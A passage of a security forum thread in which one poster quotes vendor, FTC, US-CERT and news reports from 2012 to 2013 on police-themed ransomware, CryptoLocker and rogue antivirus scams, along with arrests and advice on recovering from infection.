According to the advertisement, the actual malicious executable is both x32 and x64 compatible, successfully blocking system keys and other attempts to kill the malicious application. The cybercriminals behind the managed service have already managed to localize their templates in the languages of 13 prospective European countries such as Switzerland, Greece, France, Sweden, Netherlands, Italy, Poland, Belgium, Portugal, Finland, Spain, Germany, and Austria...
Sample screenshot of the DIY managed Ransomware-as-a-service command and control interface:
> https://webrootblog...._managed_01.png
... thousands of users are being successfully infected with the ransomware variants, with the command and control service capable of displaying statistics for the affected countries, and the operating system in use by the affected parties.
Second sample screenshot of the DIY managed Ransomware-as-a-service command and control interface:
> https://webrootblog...._managed_02.png
The managed service relies primarily on the Ukash voucher-based payment system*, and the command and control interface conveniently displays the voucher codes and their monetary value, allowing the users of the service an easy way to claim the money from the vouchers..."
* http://en.wikipedia.org/wiki/Ukash
___

- http://atlas.arbor.n...ndex#-685203363
Severity: Elevated Severity
Sep 21, 2012
Ransomware, which can be quite destructive - is being sold as a service in the underground economy.
Analysis: Ransomware can sometimes be cleaned from a system, however if it is done properly by the criminals, victims of the infection will need to rely on backups to recover from having their files encrypted...

:grrr: :grrr: :ph34r:

Edited by AplusWebMaster, 22 September 2012 - 08:09 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#26 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 02 October 2012 - 04:25 PM

FYI...

"Scareware" Marketer FTC Case Results in $163 Million Judgment ...
- http://www.ftc.gov/o...0/winfixer.shtm
10/02/2012 - "At the Federal Trade Commission’s request, a federal court imposed a judgment of more than $163 million on the final defendant in the FTC’s case against an operation that used computer “scareware” to trick consumers into thinking their computers were infected with malicious software, and then sold them software to “fix” their non-existent problem. The court order also permanently prohibits the defendant, Kristy Ross, from selling computer security software and any other software that interferes with consumers’ computer use, and from any form of deceptive marketing.
In 2008, as part of the FTC’s efforts to protect consumers from spyware and malware, the FTC charged Ross and six other defendants with conning more than one million consumers into buying software to remove malware supposedly detected by computer scans. The FTC charged that the operation used elaborate and technologically sophisticated Internet advertisements placed with advertising networks and many popular commercial websites. These ads displayed to consumers a “system scan” that invariably detected a host of malicious or otherwise dangerous files and programs on consumers’ computers. The bogus “scans” would then urge consumers to buy the defendants’ software for $40 to $60 to clean off the malware.
The U.S. District Court for the District of Maryland subsequently ordered a halt to the massive scheme, pending litigation. Under a settlement announced in 2011, defendant Marc D’Souza and his father, Maurice D’Souza, were ordered to give up $8.2 million in ill-gotten gains. Two other defendants previously settled the charges against them; the FTC obtained default judgments against three other defendants..."
* http://www.ftc.gov/o...ixeropinion.pdf

:ph34r: :!:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#27 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 31 October 2012 - 08:34 PM

FYI...

Rouge AV for Windows 8
- http://blog.trendmic...ging-windows-8/
31 Oct 2012 - "... cybercriminals are grabbing this chance to distribute threats leveraging Windows 8 and raise terror among users – just in time for Halloween. We were alerted to two threats that leverage the release of this new OS. The first one is a typical FAKEAV. Detected as TROJ_FAKEAV.EHM, this malware may be encountered when users visit malicious sites...
> http://blog.trendmic...nningresult.jpg
... the malware displays a fake scanning result to intimidate users to purchase the fake antivirus program – just like your run-of-the-mill FAKEAV variant. What is different with this malware, however, is that it is packaged as a security program made for Windows 8.
> http://blog.trendmic...AV_Windows8.jpg
The other threat is a phishing email that entices users to visit a website where they can download Windows 8 for free. Instead of a free OS, they are led to a phishing site that asks for personally identifiable information (PII) like email address, password, name that can be peddled in the underground market or used for other cybercriminal activities.
> http://blog.trendmic...il_Windows8.jpg
It is typical for cybercriminals to piggyback on the highly-anticipated release of any latest technology to take their malware, spam, malicious app to new heights... To stay safe, users must keep their cool and think twice before clicking links or visiting webpages, especially those that promise the latest items or programs for free. If it’s too good to be true – it probably is..."

:grrr: :ph34r:

Edited by AplusWebMaster, 01 November 2012 - 04:45 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#28 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 18 November 2012 - 03:02 PM

FYI...

Win 8 not immune to Ransomware
- http://www.symantec....mune-ransomware
Updated: 13 Nov 2012 - "... Symantec ran several prevalent ransomware samples currently found in the wild in a default Windows 8 environment. While some samples ran poorly on Windows 8, it did not take long to find a ransomware variant (Trojan.Ransomlock.U*) that successfully locked a Windows 8 system, effectively holding it to ransom.
Figure. Ransomware-locked Windows 8 system
> https://www.symantec...mageW1-blog.jpg
The Trojan.Ransomlock.U* variant uses the geolocation of the compromised system to serve localized ransomware screens in the appropriate language. While the ransonware running on Windows 8 correctly identified our location, the cybercriminals in this case must not have realized that English is the main language spoken in Ireland (less than 15 percent of the population is actually able to read Irish language). Their ingenuity in this case has lowered the chance of the ransom attempt being successful. As more users adopt Windows 8, Symantec expects to see more malware targeting this new environment...
> http://www.symantec....wing-menace.pdf
PDF Pg.4 - "... Fake police ransomware can be installed on a computer in a few ways but the most common to date has been through Web exploits and drive-by downloads. Drive-by download is a term used to describe how a piece of malware is installed on a user’s computer without their knowledge when that user browses to a compromised website. The download occurs in the background and is invisible to the user. In a typical drive-by download, the user browses to a website... The attacker has inserted a hidden iFrame — a special redirect — into this website. This redirection causes the user’s browser to actually connect to a second website containing an exploit pack. Exploit packs contain multiple different exploits, which, if the computer is not fully patched, causes the browser to download a file (the malware)..."
* http://www.symantec....-100315-1353-99

:grrr: :ph34r:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#29 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 22 November 2012 - 11:48 PM

FYI...

Police Ransomware bears Fake Digital Signature
- http://blog.trendmic...ital-signature/
Nov 22, 2012 - "... We encountered two samples bearing the same fake digital signature, which Trend Micro detects as TROJ_RANSOM.DDR... the digital signature’s name and its issuing provider are very suspicious... the fake signature’s sole purpose is likely to elude digisig checks. Users may encounter these files by visiting malicious sites or sites exploiting a Java vulnerability... Once executed, TROJ_RANSOM.DDR holds the system “captive” and prevents users from accessing it. It then displays a warning message to scare its victims into paying a fee. To intimidate users further, this warning message often spoofs law enforcement agencies like the FBI, often claiming that they caught users doing something illegal (or naughty) over the Internet. Based on our analysis, the two samples we found impersonate two different law enforcement agencies. The first sample mimics the FBI...
> http://blog.trendmic..._ransomware.gif
... while the second one displays a warning message purportedly from the UK’s Police Central e-Crime Unit.
> http://blog.trendmic..._ransomware.gif
First seen in Russia in 2005, ransomware has since spread to other European countries and eventually, to the United States and Canada. These variants are known to extort money by taking control of systems and taunting users to pay for a fee (or “ransom”) thru selected payment methods. The most recent wave of these variants were found capable of tracking victim’s geographic locations. This tracking enables the attackers to craft variants that impersonate the victim’s local police/law enforcement agencies while holding their entire systems captive. Software vendors include digital signatures as a way for users to verify software/program legitimacy. But cybercriminals may incorporate expired or fake digital sigs or certificates into the malware to hoodwink users into executing it. Just last October, Adobe warned users of malicious utilities carrying Adobe-issued certificates. Certain targeted attacks like the notorious FLAME was also found to use malicious file components bearing certificates issued by Microsoft..."
___

- https://www.net-secu...ews.php?id=2331
23.11.2012

:grrr: :ph34r:

Edited by AplusWebMaster, 24 November 2012 - 08:23 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#30 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 06 December 2012 - 07:44 AM

FYI...

Finnish website attack via Rogue Ad
- http://www.f-secure....s/00002468.html
Dec 5, 2012 - "... every so often, something "big" will occur in such a way that Finland becomes a kind of statistical laboratory... An advertising network used by one of Finland's most popular websites, suomi24.fi, was compromised during the December time period... all of that malware traffic was pushed by a -single- ad from a third-party advertiser's network. Just one ad... What was blocked? — Rogue Antivirus. As in fake security software...
> http://www.f-secure...._Rogue_Scan.png
These rogue programs aren't actually scanning your computer for threats, but still, they're more than happy to charge for their services. Rogues don't offer any free trials, they want payment up front... That's generally a good sign there's something amiss."

Rogue Yahoo! Messenger ...
- http://blog.trendmic...test-ym-update/
Dec 5, 2012 - "On the heels of Yahoo!’s recent announcement of upcoming updates for the Messenger platform*, certain bad guys are already taking this chance to release their own, malicious versions of Yahoo! Messenger... I encountered this particular file (detected by Trend Micro as TROJ_ADCLICK.TNH), which looks like a legitimate Yahoo! Messenger executable.
> http://blog.trendmic...senger_fake.gif
However, when I checked its file properties, I found that it is actually an AutoIt compiled file.
> http://blog.trendmic...YM_property.gif
Once users download and execute this file, which is saved as C:\Program Files\Yahoo Messenger.exe, the malware checks if an Internet connection is available by pinging Google. If it returns any value not equal to 0, it proceeds to checking the user’s existing Internet browser(s). Once a browser is found, it connects to the websites http ://{BLOCKED}y/2JiIW and http ://http ://31c3f4bd.{BLOCKED}cks .com, as seen below:
> http://blog.trendmic...ites_fakeym.gif
... this threat doesn’t stop there... these sites further redirect users to other webpages. Some of these pages even result to several, almost endless redirections. From the looks of it, this scheme looks like a classic click fraud. By connecting to these sites, which are pay-per-click sites, the malware generates a “visit” that translates into profit for the site owners and/or the malware author... the people behind this threat is attempting to piggyback on Yahoo!’s recent announcement to reach out to as many users are possible. Unfortunately, this social engineering tactic has been proven effective, such as in the case of fake keygen applications for Windows 8 and malicious versions of Bad Piggies. To stay safe from these threats, users must be cautious when visiting sites or downloading files from the Internet. For better protection, users should bookmark trusted sites and refrain from visiting unknown pages. Cybercriminals and other bad guys on the Internet are good at crafting their schemes to make them more appealing to ordinary users... it pays to know more about social engineering tactics and what makes them work..."
* http://www.ymessenge...senger-features

:ph34r: :grrr: :ph34r:

Edited by AplusWebMaster, 06 December 2012 - 07:47 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#31 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 10 December 2012 - 08:06 AM

FYI...

Ransomware speaks...
- http://blog.trendmic...ware-it-speaks/
Dec 10, 2012 - "... we received a report that a new police Trojan variant even has a “voice”. Detected as TROJ_REVETON.HM*, it locks the infected system but instead of just showing a message, it now urges users to pay verbally. The user won’t need a translator to understand what the malware is saying – it speaks the language of the country where the victim is located...
> http://blog.trendmic.../12/LockNew.jpg
... ransomware has now leaped to other European countries, the United States and Canada. Because of the payment method ransomware employs, specifically electronic cash like Ukash, PaySafeCard and MoneyPak, the people behind this threat generate profit from it but with the benefit of having a faint money trail. Because of this, the gangs profiting from this malware can hide their tracks easily..."
* http://about-threats...TROJ_REVETON.HM

:ph34r: :grrr:

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#32 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 11 January 2013 - 08:47 AM

FYI...

Rogue v ransomware - Fear and deception
- https://blogs.techne...Redirected=true
9 Jan 2013 - "... Rogues are a prime example of malware that uses fear appeals to force your hand. A common scenario you might face when encountering a rogue on your computer follows:
• You see a scanning interface on your screen, pretending to scan the file system (the scanning interface may appear while browsing the Internet or could be inadvertently downloaded).
• Upon completion of the scan, a large number of infections are reportedly found on your computer.
> https://www.microsof...roguevran/1.jpg
• A barrage of warnings related to these supposed infections are intermittently displayed to you in the form of dialog boxes and alerts popping up on your desktop or coming from your taskbar.
• Attempts to launch applications are thwarted by the rogue which blocks the applications from being launched and displays an alert, warning that the application is also infected.
• System security and firewall applications are usually targeted by the rogue as it attempts to terminate their processes, services and/or modify their registry entries, making it extremely difficult to remove the rogue from the computer.
... there is a point to all of these invasive and fear mongering tactics deployed by rogues, which is ultimately to force you to pay a fee using your credit card in order to "activate" the supposed security scanner and remove the reported infections. Rogue:Win32/Winwebsec, a rogue still in circulation and being actively updated by its creators, is an example of a rogue that contains all of these functionalities. Win32/Winwebsec, along with Win32/FakeRean, are two rogues that are still actively out in the wild, but on the whole, we have seen a steady decrease in the number of rogues in circulation in 2012.
> https://www.microsof...roguevran/2.jpg
... numbers broken down by family for most of 2012:
> https://www.microsof...roguevran/3.jpg
... rogues aren’t the only badware in town using fear appeals. In the last year, we’ve seen the rise of a new threat whose success also relies on persuading affected users to act on the receipt of a deceptive message in order to avoid an unpleasant consequence. This new(ish) badware goes by the unfortunate name of ransomware... You can find detailed information on ransomware here*..."
* http://www.microsoft...ransomware.aspx
 

:grrr: :ph34r: :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#33 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 16 January 2013 - 01:23 PM

FYI...

Ransomware - fear and deception (part 2)
- https://blogs.techne...Redirected=true
15 Jan 2013 - "Ransomware’s approach is aggressive. It uses fear to motivate an affected user to pay a fee (usually not with a credit card but using another payment system – Green Dot Moneypak, Ukash, and others). It generally uses only one deceptive message and is quite specific: you receive a message, supposedly from the police or some other law-enforcement agency accusing you of committing some form of crime. Commonly, these messages accuse the receiver of crimes associated with copyright violations (for example, downloading pirated software or other digital intellectual property) and/or the possession of illicit pornographic material. And if this threat isn’t enough, it backs the message up by rendering the system unusable, presumably until the fine is paid...
> https://www.microsof...roguevran/4.jpg
... they are on the increase.
> https://www.microsof...roguevran/5.jpg
We’ve also seen an increasing number of different types of malware that use this tactic. What started as a fairly small number of families has blossomed during 2012 into an increasingly diverse group (although I will mention that this data has been affected by our increasing focus on this type of malware and our ability to identify them correctly). Reveton and Weelsof, for example, are families that have caused considerable pain to the user.
> https://www.microsof...roguevran/6.jpg
... while rogues still account for a lion’s share of total malware in comparison to ransomware, rogues are trending down while ransomware is on the up:
> https://www.microsof...roguevran/7.jpg
... some more recent rogues have started using similar tactics to ransomware. One FakeRean variant that calls itself Privacy Protection displays fake scan results that imply child pornography has been found on the affected computer.
> https://www.microsof...roguevran/8.jpg
... Legitimate security companies won’t try to scare you into using their scanners and law enforcement agencies aren’t going to pop up a message and scare you into paying a fine. If a message tries to frighten you, think very carefully about what it’s asking you to do, and more importantly, if it’s an unreasonable request (such as sending money), don’t do it."

:ph34r: :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#34 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 13 February 2013 - 04:47 PM

FYI...

Police arrest Ransomware cybercriminals
- http://blog.trendmic...ivity-nabbed-2/
Feb 13, 2013 - "... Trend Micro threat researchers have been studying this scam throughout 2012 and have collaborated very closely with law enforcement authorities in several European countries, especially in Spain. Today, we are very happy to report that the Spanish Police has put the information to good use, and they have just announced in a press conference the arrest of one of the head members of the cybercriminal gang that produces the Ransomware strain known as REVETON. The apparent arrest of this cybercriminal of Russian origin occured in Dubai, United Arab Emirates. The law enforcement authorities are working to extradite him to Spain for prosecution. Along with his arrest, the operation included the arrests of 10 other individuals tied to the money laundering component of the gang’s operations, which managed the monetization of the PaySafeCard/UKash vouchers received as payment in the scam. The gang apparently had a branch in Spain that exchanged these vouchers and converted them into actual money, which would then be transferred to the leaders of the gang in Russia..."

- http://news.yahoo.co...-201859529.html
Feb 13, 2013 - "... The gang, operating from the Mediterranean resort cities of Benalmadena and Torremolinos, made at least €1 million ($1.35 million) annually... The 27-year-old Russian alleged to be the gang's founder and virus developer was detained in the United Arab Emirates at the request of Spanish police while on vacation and an extradition petition is pending, Martinez said. Six more Russians, two Ukrainians and two Georgians were arrested in Spain last week... Money was also stolen from the victims' accounts via ATMs in Spain, and the gang made daily international money transfers through currency exchanges and call centers to send the funds stolen to Russia. Spanish authorities identified more than 1,200 victims but said the actual number could be much higher. The government's Office of Internet Security received 784,000 visits for advice on how to get rid of the virus. Those arrested face charges of money laundering, participation in a criminal operation and fraud."

- http://h-online.com/-1803788
14 Feb 2013
 

:clapping: :ph34r:


Edited by AplusWebMaster, 14 February 2013 - 01:03 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#35 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 22 March 2013 - 09:51 AM

FYI...

DHS-themed Ransomware in the wild
- https://www.us-cert....emed-Ransomware
Last revised: March 22, 2013 - "US-CERT has received reports of apparently DHS-themed ransomware occurring in the wild. Users who are being targeted by the ransomware receive an email message claiming that use of their computer has been suspended and that the user must pay a fine to unblock it. The ransomware -falsely- claims to be from the U.S. Department of Homeland Security and the National Cyber Security Division. Users who are infected with the malware should consult with a reputable security expert to assist in removing the malware... US-CERT and DHS encourage users and administrators to use caution when encountering these types of email messages..."

Screenshot: http://news.softpedi...nsomware-2.jpg/
March 21, 2013

- http://www.reuters.c...E92K0Z920130321
Mar 21, 2013
 

:grrr: :ph34r:


Edited by AplusWebMaster, 22 March 2013 - 10:34 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#36 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 03 April 2013 - 09:47 AM

FYI...

Ransomware leverages victims' browser histories for increased credibility
- https://www.computer...sed_credibility
April 1, 2013 - "... A new ransomware variant that employs this trick was spotted over the weekend by an independent malware analyst known online as Kafeine. Dubbed Kovter, this version stands out because it uses information gathered from the victim's browser history in order to make the scam message more credible, Kafeine said Friday in a blog post*. Kovter displays a fake warning allegedly from the U.S. Department of Justice, the U.S. Department of Homeland Security and the FBI, that claims the victim's computer was used to download and distribute illegal content. The message also lists the computer's IP address, its host name and a website from which the illegal material was allegedly downloaded. The malware checks if any of the sites already present in the computer's browser history is present in a remote list of porn sites whose content is not necessarily illegal, and if there's a match, it displays it in the message. By using this technique and naming a site that the victim has actually visited as the source for the alleged illegal content, the ransomware authors attempt to increase the credibility of their message. If no match is found when checking the browser history against the remote list, the malware will just use a random porn site in the message... The authors of police-themed ransomware are constantly trying to improve their success rate and this is just the latest in a long series of tricks they have added. Some variants are actually using the computer's webcam, if one is present, to take a picture of the user and include it in the message in order to give the impression that the authorities are recording the user. Another variant gives victims a deadline of 48 hours to pay the made-up fine before their computer drive is reformatted and their data is destroyed. The average number of daily infection attempts with police-themed ransomware has doubled during the first months of 2013..."
*Screenshot:  https://d1piko3ylsjh...e_kovter_01.png
 

:grrr: :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#37 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 18 May 2013 - 06:59 AM

FYI...

Ransomware - Reveton.B...
- https://www.net-secu...ews.php?id=2497
May 17, 2013 - "... Microsoft researchers are warning about a new variant of the well-known Reveton ransomware doing rounds. It is being delivered on the victims' computer via the Blackhole exploit kit, and on the surface acts like it always did: locks the computer screen and demands money to unlock it:
> https://www.net-secu...on-17052013.jpg
... in the background, the malware downloads a password-stealer component from its C&C server and runs it. "PWS:Win32/Reveton.B can steal passwords for a comprehensive selection of file downloaders, remote control applications, FTP, poker, chat and e-mail clients, as well as passwords stored by browsers and in protected storage," say* the researchers. "However, as it can load almost any DLL served by the C&C on the fly, this might change." Keeping your OS and software updates should minimize the possibility of being faced with malware, they say, but in case you do get hit by a Reveton infection, it's a good idea to change all your passwords once you remove the malware from the computer."
* http://blogs.technet...ll-pay-off.aspx
 

:( :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#38 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 27 June 2013 - 11:15 AM

FYI...

Top 5 Fake Security Rogues of 2013
- http://blog.webroot....rogues-of-2013/
June 27, 2013 - "We see users on the internet getting infected with Rogue Security Malware all the time. In fact, it’s one of the most common and obvious type of infections we see. The Rogues lock-down your computer and prevent you from opening any applications so you’re forced to read their scam. Although they use various tactics and convincing GUIs to get onto your computer, they all share a common goal: To get your money.
Here are the top 5 rogues reported this year (Screenshots):
System Care Antivirus: https://webrootblog....virus.jpg?w=750
Internet Security: https://webrootblog....urity.png?w=736
Disk Antivirus Professional: https://webrootblog....virus.png?w=752
System Doctor 2014: https://webrootblog....-2014.jpg?w=801
AVASoft professional antivirus: https://webrootblog....virus.jpg?w=796
... The most common install from fake Adobe update installers and malicious URLs linked from pictures that look like this:
1) https://webrootblog....jpg?w=296&h=145
2) https://webrootblog....jpg?w=560&h=145
Once you click on images like this in the wild and receive the payload from the malicious URLs, you’ll have effectively given permission and installed the Rogue onto your computer.
> https://webrootblog....enter.jpg?w=869
Don’t give them your credit card information.
... New variants of these rogues come out constantly so there are millions of unique signatures being dropped on computers everyday..."

- https://blogs.techne...Redirected=true
27 Jun 2013
 

:grrr: :ph34r: :grrr:


Edited by AplusWebMaster, 06 July 2013 - 06:59 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#39 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 17 July 2013 - 09:17 AM

FYI...

Ransomware targets Apple Mac OS X users
- http://blog.malwareb...mac-os-x-users/
July 15, 2013 - "... Cyber-criminals, well known for not re-inventing the wheel, have ‘ported’ the latest ransomware to OS X, not by using some complicated exploit but rather leveraging the browser and its ‘restore from crash’ feature.
Screenshot: http://cdn.blog.malw...ransomware1.png
The ransomware page is being pushed onto unsuspecting users browsing regular sites but in particular when searching for popular keywords. Warnings appearing to be from the FBI tell the victim: “you have been viewing or distributing prohibited Pornographic content.. To unlock your computer and to avoid other legal consequences, you are obligated to pay a release fee of $300.” A quick look at the address bar shows an interesting URL: fbi.gov.id657546456-3999456674.k8381 . com, the bad guys are clearly trying to fool users. If you choose to ignore the message (which you should), you cannot get rid of the page:
> http://cdn.blog.malw...13/07/lock1.png
If you “force quit” the application, the same ransomware page will come back the next time to restart Safari because of the “restore from crash” feature which loads backs the last URL visited before the browser was quit unexpectedly. Talk about a vicious circle... There -is- a way to get rid of it (without clicking on the prompt 150 times) and more importantly without paying the $300 ransom. Click on the Safari menu and then choose “Reset Safari”:
> http://cdn.blog.malw...13/07/reset.png
Make sure all items are marked and hit the Reset button:
> http://cdn.blog.malw...3/07/reset2.png
You can bet many people are going to fall for this scam and  pay the ransom money, filling the bad guys’ pockets. Whenever alarming messages are displayed, it is important to take the time to review them, call a friend or talk to someone about it. The bad guys know how to use social engineering to entice victims as, for example, I was lead to this locked page by doing a search for Taylor Swift on Bing images. The victim will feel they may have actually being doing something wrong and got caught and ashamed, will pay the “fine.” This scam is unfortunately all too efficient and is not going away anytime soon. Watch this tutorial* on how to get rid of the FBI ransomware for OS X..."
*
___

- https://www.ic3.gov/...3/130718-2.aspx
July 18, 2013
 

:ph34r: :ph34r:


Edited by AplusWebMaster, 19 July 2013 - 07:37 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#40 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 30 July 2013 - 01:11 PM

FYI...

DHS-themed ransomware - in the wild...
- https://www.us-cert....nsomware-UPDATE
July 30, 2013 - "US-CERT has received reports of increased activity concerning an apparently DHS-themed ransomware malware infection occurring in the wild. Users who are being targeted by the ransomware receive a message claiming that use of their computer has been suspended and that the user must pay a fine to unblock it. One iteration of this malware also takes a webcam (if available) photo or video of a recipient and posts it in a pop-up to add to the appearance of legitimacy. The ransomware -falsely- claims to be from the U.S. Department of Homeland Security and the National Cyber Security Division. Users who are infected with the malware should consult with a reputable security expert to assist in removing the malware..."
 

:ph34r: :ph34r:


This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#41 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 22 August 2013 - 12:28 PM

FYI...

Chinese Ransomlock malware changes Windows Login Credentials
- http://www.symantec....gin-credentials
21 Aug 2013 - "... new type of ransomlock malware that not only originates from China but also uses a new ransom technique to force users into paying to have their computers unlocked. This threat is written in Easy Programming Language and is spread mostly through a popular Chinese instant messaging provider. Once a computer is compromised, the threat changes the login credentials of the current user and restarts the system using the newly created credentials. The login password is changed to “tan123456789” (this was hardcoded in the sample we acquired) but the malware author may update the threat and change the password. The account name is changed to “contact [IM ACCOUNT USER ID] if you want to know the password” (English translation) so that once the computer has restarted, and the user is unable to log in, they will see the account name/message and contact the user ID in order to get the new password.
Login screen with changed account name after system restart
> https://www.symantec...igure1_Edit.png
If the victim contacts the provided user ID, who is more than likely the malware author, they will see a statement on the profile page asking for approximately 20 Chinese Yuan (US$3.25). The statement says that the login password will be sent as soon as the money is received and that if the malware author is pestered by the user they will be blocked. Symantec detects this threat as Trojan.Ransomlock.AF. For users already infected with this threat, there are several ways to restore system access:
1. Use password “tan123456789” to log into the system and reset the password (as mentioned before, this might -not- always work as the password may be changed by the malware author)
2. Use another administrator account to log into the system and reset the password
3. If your current account is not a super administrator account, enter safe mode and log in as super administrator and then reset the password
4. Use Windows recovery disk to reset the password."
___

Spear-Phishing E-mail with Missing Children Theme
- https://www.us-cert....-Children-Theme
August 22, 2013 - "The FBI is aware of a spear-phishing e-mail appearing as if it were sent from the National Center for Missing and Exploited Children. The subject of the e-mail is "Search for Missing Children," and a zip file containing 3 malicious files is attached. E-mail recipients should always treat links and attachments in unsolicited or unexpected e-mail with caution."
 

:grrr: :ph34r:


Edited by AplusWebMaster, 22 August 2013 - 12:55 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#42 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,266 posts

Posted 17 October 2013 - 01:20 PM

FYI...

Cryptolocker ransomware
- http://arstechnica.c...00-in-bitcoins/
Oct 17 2013 - "Malware that takes computers hostage until users pay a ransom is getting meaner, and thanks to the growing prevalence of Bitcoin and other digital payment systems, it's easier than ever for online crooks to capitalize on these "ransomware" schemes. If this wasn't already abundantly clear, consider the experience of Nic, an Ars reader who fixes PCs for a living and recently helped a client repair the damage inflicted by a particularly nasty title known as CryptoLocker. It started when an end user in the client's accounting department received an e-mail purporting to come from Intuit. Yes, the attached archived zip file with an executable inside should have been a dead giveaway that this message was malicious and was in no way affiliated with Intuit. But accounting employees are used to receiving e-mails from financial companies. When the receiver clicked on it, he saw a white box flash briefly on his screen but didn't notice anything else out of the ordinary. He then locked his computer and attended several meetings. Within a few hours, the company's IT department received word of a corrupt file stored on a network drive that was available to multiple employees, including the one who received the malicious e-mail. A quick investigation soon uncovered other corrupted files, most or all of which had been accessed by the accounting employee. By the time CryptoLocker had run its course, hundreds of gigabytes worth of company data was no longer available..."
> http://cdn.arstechni...ot1-640x498.jpg

Cryptolocker Prevention Kit
- http://www.thirdtier...prevention-kit/
Oct 14, 2013 - "The SMBKitchen Crew and Third Tier staff have put together a group materials that were published as part of our SMBKitchen Project and only available to subscribers. However because this virus is spreading so rapidly and is so serious we’ve decided to make these materials available to everyone. The kit includes an article on cleaning up after infection but more importantly provides materials and instruction for deploying preventative block using software restriction policies. The articles provide instruction for installing them via GPO on domain computers and terminal servers, and non-domain joined machines too. We have also provide GPO settings that you can important into your environment. We’ve zipped it up into a single file. Download it now*"
* http://www.thirdtier...eventionKit.zip
___

- http://atlas.arbor.n...ndex#1331587000
High Severity
21 Oct 2013
The CryptoLocker ransomware has been popular lately. Several serious outbreaks have taken place and this threat is harder to recover from unless proactive measures have been taken.
Source: http://nakedsecurity...p-and-recovery/

- http://windowssecret...rnicious-virus/
Oct 23, 2013

- https://isc.sans.edu...l?storyid=16871
Last Updated: 2013-10-22 14:09:38 UTC

CryptoLocker: Its Spam and ZeuS/ZBOT Connection
- http://blog.trendmic...bot-connection/
Oct 21, 2013 - "... the CryptoLocker malware that not only blocks accessing to the system, but also forces users to buy a $300 decrypting tool by locking or encrypting specific files in the system. Recently, we were alerted to a spam campaign that we determined to be responsible for CryptoLocker infections. The spammed messages contain malicious attachments belonging to TROJ_UPATRE, a malware family characterized by its having small file size and a simple downloading function. Using feedback provided by the Trend Micro Smart Protection Network, we searched for information linking CryptoLocker ransomware to this downloader and came across with a sample email containing a malicious attachment (detected as TROJ_UPATRE.VNA):
(Screenshot of spam with malicious attachment)
> http://blog.trendmic...ryptolocker.jpg
